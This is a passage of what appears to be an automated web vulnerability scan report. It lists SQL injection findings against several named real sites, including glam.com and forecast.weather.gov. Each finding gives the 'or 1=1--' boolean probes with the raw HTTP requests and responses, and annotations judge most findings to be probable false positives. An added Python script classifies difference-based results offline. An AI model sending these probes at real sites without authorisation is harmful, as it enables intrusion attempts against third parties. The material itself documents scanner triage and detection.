<script type="text/javascript" src="http://glamnewlive.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+d7e09363ffe3839fd80121c693e498075172e7fd+1303351171"></script> <!-- Netica Monitoring --><!-- DBOK -->
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script>
<script type="text/javascript">_uacct = "UA-2024191-1"; _udn="glam.com"; try { urchinTracker(); } catch(err){} </script>
<!-- Start Quantcast tag -->
<script type="text/javascript"> _qoptions={ qacct:"p-874AVp33Bbtkg" };</script>
<script type="text/javascript" src="http://edge.quantserve.com/quant.js"></script>

<!-- End Quantcast tag -->
</head>
<body class="single single-post postid-110683" id="bodyID"><!-- Container START -->
   <noscript><img src="http://pixel.quantserve.com/pixel/p-874AVp33Bbtkg.gif" class="hide" border="0" height="1" width="1" alt="Quantcast"/></noscript>
<div align="center" class="Container"><!-- Page START -->
<div class="topCorner"></div>
<div class="Box">
<table width="100%" cellpadding="0" cellspacing="0" border="0" class="Page">
<tr><td><div class="HorizantalSpacer"></div>
<div class="Header">
<a href="http://www.glam.com" class="Logo sprite_v1-glamcom_206_36"></a>
<div class="LoginLinks" align="right">
                                       <script type="text/javascript" language="javascript"> function setCookieforLogin(c_name,value,expiredays){ if(expiredays){ var exdate=new Date(); exdate.setDate(exdate.getDate()+expiredays); var expires=exdate.toGMTString(); } else var expires=""; document.cookie=c_name+ "=" +escape(value)+((expiredays==null) ? "" : ";expires="+expires)+";domain=.glam.com"; }
                                       function logoutFunction(redirectURL){ setCookieforLogin('logedIncheck','',-1); location.href=redirectURL; }if(!getCookie('logedIncheck')){ document.write('<div onclick="toggleSignIn(\'head\');" id="signInArrowImg"><div id="signInArrowUp">&nbsp;</div><div id="signInArrowDown">&nbsp;</d
...[SNIP]...

1.22. http://fashion.glam.com/wp-content/plugins/menus-plus/javascriptmenu.php [menu parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://fashion.glam.com
Path:   /wp-content/plugins/menus-plus/javascriptmenu.php

Issue detail

The menu parameter appears to be vulnerable to SQL injection attacks. The payloads 71416728%20or%201%3d1--%20 and 71416728%20or%201%3d2--%20 were each submitted in the menu parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. The evidence here is stronger than for 1.21: the menu parameter is numeric and the payload is unquoted (menu=171416728 or 1=1-- ), Response 1 (21118 bytes) carries the whole top navigation while Response 2 (2493 bytes) returns an empty <ul class='topnav'></ul>, which is exactly what an unquoted numeric WHERE clause would do when it matches every row versus no row. Confirm manually before rating it, since a script that simply returns nothing for an unknown id would look the same.

Request 1

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=171416728%20or%201%3d1--%20 HTTP/1.1
Host: fashion.glam.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348792.1303348869.2; __utmc=234602824; bkpix2=1; qcsegs=D,T; __utmb=234602824

Response 1

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Wed, 20 Apr 2011 18:52:21 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
Content-Length: 21118
X-Varnish: 303298774
Expires: Thu, 21 Apr 2011 01:52:23 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Apr 2011 01:52:23 GMT
Connection: close

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'><li class='cufonClass'><a href='http://www.glam.com' title='' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://www.glam.com' title='' onmouseover='showSubMenu(0)'>Home</a><li class='LineSeperator sprite_v1-seperator'></li><li class='cufonClass'><a href='http://fashion.glam.com/' title='Fashion' style='color:white' onmouseover='showSubMenu(4)' onmouseout='hideSubMenu();' >Fashion</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://trends.glam.com/' title='Trends' onmouseover='showSubMenu(5)' onmouseout='hideSubMenu();'>Trends</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://runway.glam.com/' title='Runway' onmouseover='showSubMenu(6)' onmouseout='hideSubMenu();'>Runway</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://designers.glam.com/' title='Designers' onmouseover='showSubMenu(7)' onmouseout='hideSubMenu();'>Designers</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://shopping.glam.com/' title='Shopping' onmouseover='showSubMenu(8)' onmouseout='hideSubMenu();'>Shopping</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://beauty.glam.com/' title='Beauty' onmouseover='showSubMenu(9)' onmouseout='hideSubMenu();'>Beauty</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://hair.glam.com/' title='Hair' onmouseover='showSubMenu(10)' onmouseout='hideSubMenu();'>Hair</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li class='cufonClass'><a href='http://makeup.glam.com/' title='Makeup' onmouseover='showSubMenu(11)' onmouseout='hideSubMenu();'>Makeup</a></li><li class='LineSeperator sprite_v1-seperator'> </li><li 
class='cufonClass'><a href='http://skinbody.glam.com/' title='Skin &amp; Body' onmouseover=
...[SNIP]...

Request 2

GET /wp-content/plugins/menus-plus/javascriptmenu.php?menu=171416728%20or%201%3d2--%20 HTTP/1.1
Host: fashion.glam.com
Proxy-Connection: keep-alive
Referer: http://fashion.glam.com/2011/04/18/my-spring-shopping-decisions/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=234602824.1303348792.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-764090074-1303348792453; glam_sid=116391130334874196611; __utma=234602824.706286063.1303348792.1303348792.1303348869.2; __utmc=234602824; bkpix2=1; qcsegs=D,T; __utmb=234602824

Response 2

HTTP/1.1 200 OK
Server: Apache/2.2.3 (Unix) mod_ssl/2.2.3 OpenSSL/0.9.8e-fips-rhel5 PHP/5.1.6
X-Powered-By: PHP/5.1.6
x-channel: menuplus
Last-Modified: Thu, 21 Apr 2011 01:52:24 GMT
Vary: Accept-Encoding
Content-Type: application/x-javascript
backend-server: app135
Content-Length: 2493
X-Varnish: 303298810
Expires: Thu, 21 Apr 2011 01:52:24 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Thu, 21 Apr 2011 01:52:24 GMT
Connection: close

var string =" <div id='Nav' class='sprite_v1-default-navBar-bg-img'><ul class='topnav'></ul></div> "; document.write(string);var string ="<div onmouseover='showme();' onmouseout='hideme();' class='SubNav'><div id='submenu_active' ><ul style='width:550px' class='topsubnav' id='glam-menus-plus'><li class=''><a href='http://trends.glam.com/' title='Trends'>Trends</a></li><li class=''><a href='http://runway.glam.com/' title='Runway'>Runway</a></li><li class=''><a href='http://designers.glam.com/' title='Designers'>Designers</a></li><li class=''><a href='http://shopping.glam.com/' title='Shopping'>Shopping</a></li><li class=''><a href='http://fwi.glam.com/' title='Fashion Week Insider'>Fashion Week Insider</a></li></ul></div><style type='text/css'>._glam_search_button {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px 0; width: 55px; height: 20px;list-style:none} ._glam_search_twitter {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: -1070px -300px; width: 20px; height: 20px;} ._glam_search_facebook {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -495px; width: 20px; height: 20px;} ._glam_search_rss {background:transparent url('/wp-content/themes/glam_v1/static/images/sprite-images.png');background-position: 0 -1935px; width: 20px; height: 20px;}</style> <div class='SocialContainer'id='menusearch'><div class='SearchBox'><form role='search' name='searchform' method='get' id='searchform' action='http://www.glam.com' ><div class='search_controls'><input type='text' style='height:15px;' value='' name='search' id='search' /></div><div style='float:left;margin-top:3px;'><span onclick='javascript:document.searchform.submit();' style='cursor:pointer'><div class='_glam_search_button'></div></span></div></div> <ul class='social'> <a href='http://twitter.com/onglamfashion' 
target='_blank'><div class='_glam_search_twitter'>
...[SNIP]...
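The difference-based check behind findings 1.21 and 1.22, reduced to an offline script. This is an added example, not code from the XSS.CX report or from Burp Scanner; the response bodies are constructed stand-ins modelled on the excerpts above (the rotating disqus remote_auth_s2 token for 1.21, the full versus empty topnav list for 1.22), the volatile-content pattern and the thresholds are assumptions, and nothing is sent over the network. The step it adds to the scanner's logic is sending the TRUE payload twice: the jitter between two identical requests sets the bar that the TRUE/FALSE difference has to clear.

```python
"""Boolean-difference SQL injection probe with a jitter check (added example)."""
import difflib
import re

TRUE_PAYLOAD = "%20or%201%3d1--%20"   # the scanner's TRUE probe
FALSE_PAYLOAD = "%20or%201%3d2--%20"  # the scanner's FALSE probe

# Fragments known to change on every request regardless of input. Modelled on
# the disqus remote_auth_s2 signature+timestamp seen in finding 1.21; the list
# is an assumption and must be tuned per target.
VOLATILE_PATTERNS = [
    re.compile(r"remote_auth_s2=[^&<\s'\"]+"),
]


def normalize(body: str) -> str:
    """Mask volatile fragments so the diff reflects the payload, not the clock."""
    for pat in VOLATILE_PATTERNS:
        body = pat.sub("<volatile>", body)
    return body


def similarity(a: str, b: str) -> float:
    """0.0 (nothing in common) .. 1.0 (identical), measured after masking."""
    return difflib.SequenceMatcher(None, normalize(a), normalize(b), autojunk=False).ratio()


def verdict(true_a: str, true_b: str, false_body: str, min_signal: float = 0.05):
    """Classify one boolean-difference probe.

    true_a, true_b : two responses to the same TRUE-payload request
    false_body     : response to the FALSE-payload request
    noise  = how much two identical requests differ from each other (jitter)
    signal = how much TRUE differs from FALSE
    The thresholds (signal at least 5 % and more than three times the jitter)
    are assumptions chosen for this example, not Burp's own values.
    """
    noise = 1.0 - similarity(true_a, true_b)
    signal = 1.0 - similarity(true_a, false_body)
    label = "candidate" if signal >= min_signal and signal > 3 * noise else "no-difference"
    return label, round(signal, 3), round(noise, 3)


# --- constructed sample responses (not captured traffic) ---------------------

def article_page(token: str) -> str:
    """Stand-in for the fashion.glam.com article (1.21): same markup, fresh disqus token."""
    return (
        "<html><head>"
        f'<script src="http://glamnewlive.disqus.com/remote_auth.js?remote_auth_s2=W10%3D+{token}"></script>'
        "</head><body class='single single-post postid-110683'>"
        "<div class='Header'><a href='http://www.glam.com' class='Logo'></a></div>"
        "<p>Article text that does not depend on the unknown query parameter.</p>"
        "</body></html>"
    )


MENU_ROWS = ["Home", "Fashion", "Trends", "Runway", "Designers", "Shopping", "Beauty", "Hair"]


def menu_script(rows) -> str:
    """Stand-in for javascriptmenu.php (1.22): one <li> per row the menu query returned."""
    items = "".join(
        f"<li class='cufonClass'><a href='http://{r.lower()}.glam.com/' title='{r}'>{r}</a></li>"
        for r in rows
    )
    return f"var string =\" <div id='Nav'><ul class='topnav'>{items}</ul></div> \"; document.write(string);"


def run_examples() -> dict:
    """Apply the verdict to both findings' stand-ins."""
    return {
        # 1.21: every request gets a new signature, the rest of the page is constant
        "1.21 article, unknown param": verdict(
            article_page("f2037123+1303351169"),
            article_page("b41c9e0d+1303351170"),
            article_page("d7e09363+1303351171"),
        )[0],
        # 1.22: TRUE returns the whole menu, FALSE returns an empty list
        "1.22 menu=171416728 or 1=1--": verdict(
            menu_script(MENU_ROWS), menu_script(MENU_ROWS), menu_script([])
        )[0],
    }


if __name__ == "__main__":
    for name, label in run_examples().items():
        print(f"{name}: {label}")
```

Run it directly to print the two verdicts. Against a live target, replace the stand-in bodies with the bodies of three real requests (TRUE, TRUE again, FALSE) and extend VOLATILE_PATTERNS with whatever the site rotates per request: CSRF tokens, ad slots, analytics nonces.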

1.23. http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://ferruh.mavituna.com
Path:   /sql-injection-cheatsheet-oku/

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the name of an arbitrarily supplied request parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The scanner fingerprinted the database as PostgreSQL, but the only database error text in the response is a Microsoft OLE DB / ODBC SQL Server string, and it sits inside a <code> element on a page whose path is /sql-injection-cheatsheet-oku/ and whose title begins "SQL Injection". That string is static cheat-sheet content that happened to match an error-message signature, not an error raised by the ' in the request (which returned 200 OK). Treat this as a probable false positive unless manual review finds an error message that changes with the input.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /sql-injection-cheatsheet-oku/?1'=1 HTTP/1.1
Host: ferruh.mavituna.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sat, 26 Feb 2011 02:08:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-Powered-By: UrlRewriter.NET 2.0.0
Set-Cookie: ASP.NET_SessionId=3clmea55v5w3ngbt3e5t0e2l; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 76876

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>SQL Injection
...[SNIP]...
<code>Microsoft OLE DB Provider for ODBC Drivers error '80040e07' <br />[Microsoft][ODBC SQL Server Driver][SQL Server]The sum or average aggregate operation cannot take a <strong class="hi">
...[SNIP]...

1.24. http://forecast.weather.gov/product.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://forecast.weather.gov
Path:   /product.php

Issue detail

The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads 89542108%20or%201%3d1--%20 and 89542108%20or%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. Here the payload was spliced into the middle of a parameter name (versi...on), and the two responses were served through different cache chains (Via: wwwcache-2 versus nws-hq-cache01) from different templates: Response 1 is XHTML 1.0 Strict with main_1024.css, UTF-8 and max-age=900, Response 2 is HTML 4.01 Transitional with main.css, iso-8859-1 and max-age=1800. Differences of that kind come from the caching and backend layer, not from a SQL query, so treat this as a likely false positive pending manual review.

Request 1

GET /product.php?site=NWS&issuedby=GYX&product=RWS&format=CI&versi/189542108%20or%201%3d1--%20on=1 HTTP/1.1
Host: forecast.weather.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 200 OK
Age: 16
Date: Sat, 26 Feb 2011 02:22:03 GMT
Content-Length: 13809
Content-Type: text/html; charset=UTF-8
Expires: Sat, 26 Feb 2011 02:37:03 GMT
Cache-Control: max-age=900
X-Pad: work around browser bug
Server: Apache
Via: 1.1 wwwcache-2 (NetCache NetApp/6.0.7), 1.0 c1.w2.woc (squid)
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en"><head>
<meta http-equiv="Content-Type" content="application/xhtml+xml; charset=utf-8" />
<link rel="schema.DC" href="http://purl.org/dc/elements/1.1/" /><title>National Weather Service Text Product Display</title>
<meta name="DC.title" content="National Weather Service Text Product Display" />
<meta name="DC.description" content="National Weather Service is your source for the most complete weather forecast and weather related information on the web" />
<meta name="DC.creator" content="US Department of Commerce, NOAA, National Weather Service" />
<meta name="DC.date.created" scheme="ISO8601" content="2010-02-16" />
<meta name="DC.date.reviewed" scheme="ISO8601" content="2009-11-10" />
<meta name="DC.language" scheme="DCTERMS.RFC1766" content="EN-US" />
<meta name="DC.keywords" content="weather, local weather forecast, local forecast, weather forecasts, local weather, radar, fire weather, center weather service units, hamweather" />
<meta name="DC.publisher" content="NOAA's National Weather Service" />
<meta name="DC.contributor" content="National Weather Service" />
<meta name="DC.rights" content="http://www.weather.gov/disclaimer.php" />
<meta name="rating" content="General" />
<meta name="robots" content="index,follow" />
<meta name="Distribution" content="Global" />
<meta http-equiv="Content-Style-Type" content="text/css" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<link href="/css/default/main_1024.css" title="nwsstyle" rel="stylesheet" type="text/css" media="all" />
<link href="/css/product/main.css" title="nwsstyle" rel="stylesheet" type="text/css" media="all"></head>
<body>
<div id="container"><a href="#skipnav" class="skip">Skip Navigation</a>
<div id="header">
<div id="brand"><a href="http://www.noaa.gov/" class="noaalink">NOAA</a><div class="aligncenter"><a href="http://www.weather.gov/" class="wxlin
...[SNIP]...

Request 2

GET /product.php?site=NWS&issuedby=GYX&product=RWS&format=CI&versi/189542108%20or%201%3d2--%20on=1 HTTP/1.1
Host: forecast.weather.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.0 200 OK
Age: 2
X-Cache-TTL: 1798
Date: Sat, 26 Feb 2011 02:23:22 GMT
Content-Length: 13278
Content-Type: text/html; charset=iso-8859-1
Expires: Sat, 26 Feb 2011 02:53:22 GMT
Cache-Control: max-age=1800
Server: Apache
Vary: Accept-Encoding
X-Cached-Time: Sat, 26 Feb 2011 02:23:24 GMT
Via: 1.1 nws-hq-cache01 (NetCache NetApp/6.0.7), 1.0 c1.w2.woc (squid)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<link rel="schema.DC" href="http://purl.org/dc/elements/1.1/">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" /><title>National Weather Service Text Product Display</title>
<meta name="DC.title" content="National Weather Service Text Product Display" />
<meta name="DC.description" content="National Weather Service is your source for the most complete weather forecast and weather related information on the web" />
<meta name="DC.creator" content="US Department of Commerce, NOAA, National Weather Service" />
<meta name="DC.date.created" scheme="ISO8601" content="2010-02-16" />
<meta name="DC.date.reviewed" scheme="ISO8601" content="2009-03-02" />
<meta name="DC.language" scheme="DCTERMS.RFC1766" content="EN-US" />
<meta name="DC.keywords" content="weather, local weather forecast, local forecast, weather forecasts, local weather, radar, fire weather, center weather service units, hamweather" />
<meta name="DC.publisher" content="NOAA's National Weather Service" />
<meta name="DC.contributor" content="National Weather Service" />
<meta name="DC.rights" content="http://www.weather.gov/disclaimer.php" />
<meta name="rating" content="General" />
<meta name="robots" content="index,follow" />
<meta name="Distribution" content="Global" />
<link href="/css/default/main.css" title="nwsstyle" rel="stylesheet" type="text/css" media="all" />
<link href="/css/product/main.css" title="nwsstyle" rel="stylesheet" type="text/css" media="all"></head>
<body>
<a href="#skipnav" class="skip">Skip Navigation</a>
<div id="header">
<div id="brand"><a href="http://www.noaa.gov/" class="noaalink">NOAA</a><div align="center"><a href="http://www.weather.gov/" class="wxlink">weather.gov</a></div>
<h1>National Oceanic and Atmospheric Administration's</h1>
<a href="http://www.weather.gov" class="site">National Weather Service</a>
</div>
<div id="searchDiv">
   <!--begin search code -->
   <form met
...[SNIP]...

1.25. http://forecast.weather.gov/wwamap/wwatxtget.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Tentative
Host:   http://forecast.weather.gov
Path:   /wwamap/wwatxtget.php

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payloads 77422894'%20or%201%3d1--%20 and 77422894'%20or%201%3d2--%20 were each submitted in the REST URL parameter 1. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. Here both responses are 404 Not Found with tiny bodies (139 and 36 bytes) and arrived via different proxy chains (NetCache plus squid versus squid alone); the payload altered the first path segment, so the request no longer addresses the wwamap directory at all. Two different 404 bodies from two different front-end paths are a far more plausible explanation than a SQL query, so manual review is essential before this is reported.

Request 1

GET /wwamap77422894'%20or%201%3d1--%20/wwatxtget.php HTTP/1.1
Host: forecast.weather.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.0 404 Not Found
Date: Sat, 26 Feb 2011 02:10:04 GMT
Content-Length: 139
Content-Type: text/html; charset=UTF-8
Server: Apache
Via: 1.1 wwwcache-1 (NetCache NetApp/6.0.7), 1.0 c3.w3.woc (squid)
Connection: close

<h1>An error occurred!<br />Please contact the <a href="mailto:dan.arnold@noaa.gov">webmaster</a> about this problem.<br /> Thank you!</h1>

Request 2

GET /wwamap77422894'%20or%201%3d2--%20/wwatxtget.php HTTP/1.1
Host: forecast.weather.gov
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.0 404 Not Found
Date: Sat, 26 Feb 2011 02:10:05 GMT
Server: Apache
Content-Length: 36
Content-Type: text/html; charset=UTF-8
Via: 1.0 c3.w3.woc (squid)
Connection: close

<h3>Incorrect Template Request!</h3>

1.26. http://h.ackack.net/ [mystique parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /

Issue detail

The mystique parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the mystique parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The scanner reports the database as PostgreSQL, but the only evidence in the response is <li class="page page-postgresql ">, a WordPress page-list entry for a page named PostgreSQL; the response is the site's normal 200 page and no database error message appears. Probable false positive.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /?mystique=jquery_init'&ver=2.4.2 HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/coldfusion-mysql-xsses.html/x2258057137'%20or%201%3d1--%20
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:32:45 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 52415

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.27. http://h.ackack.net/coldfusion-mysql-xsses.html/x22 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /coldfusion-mysql-xsses.html/x22

Issue detail

The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload 58057137'%20or%201%3d1--%20 was submitted in the REST URL parameter 2, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The scanner reports the database as PostgreSQL, but the response is WordPress's ordinary 404 page and the only match is <li class="page page-postgresql ">, a page-list entry for a page named PostgreSQL; no database error message appears. Probable false positive.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /coldfusion-mysql-xsses.html/x2258057137'%20or%201%3d1--%20 HTTP/1.1
Host: h.ackack.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:11:05 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Last-Modified: Sat, 26 Feb 2011 02:11:06 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 31293

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<li class="page page-postgresql ">
...[SNIP]...

1.28. http://h.ackack.net/protocols [mystique parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /protocols

Issue detail

The mystique parameter appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the mystique parameter, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The scanner reports the database as PostgreSQL, but the only match in the response is <link rel='prev' title='PostgreSQL' href='http://h.ackack.net/cheat-sheets/postgresql' />, a navigation link to a cheat-sheet page with that name; the response is the normal 200 page and no database error message appears. Probable false positive.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /protocols?mystique=css' HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/protocols
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=232936135.1298687462.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utma=232936135.1875523045.1298687462.1298687462.1298687462.1; __utmc=232936135; __utmb=232936135.2.10.1298687462

Response

HTTP/1.1 200 OK
Date: Sat, 26 Feb 2011 02:33:35 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 42432

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >

<head profile="http://gmpg.org/xfn/11">
<meta http-e
...[SNIP]...
<link rel='prev' title='PostgreSQL' href='http://h.ackack.net/cheat-sheets/postgresql' />
...[SNIP]...

1.29. http://h.ackack.net/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushPhp.js [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://h.ackack.net
Path:   /wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushPhp.js

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ' was submitted in the REST URL parameter 1, and a database error message was returned. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The scanner reports the database as PostgreSQL, but the ' in the path simply produced WordPress's 404 page, and the only match is <li class="page page-postgresql ">, a page-list entry for a page named PostgreSQL; no database error message appears. Probable false positive.

Remediation detail

The application should handle errors gracefully and prevent SQL error messages from being returned in responses.

Request

GET /wp-content'/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shBrushPhp.js?ver=3.0.83b HTTP/1.1
Host: h.ackack.net
Proxy-Connection: keep-alive
Referer: http://h.ackack.net/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=232936135.1298687462.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/11; __utma=232936135.1875523045.1298687462.1298687462.1298687462.1; __utmc=232936135; __utmb=232936135.1.10.1298687462

Response

HTTP/1.1 404 Not Found
Date: Sat, 26 Feb 2011 02:33:28 GMT
Server: Apache
X-Powered-By: PHP/5.3.5
Vary: Cookie
X-Pingback: http://h.ackack.net/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
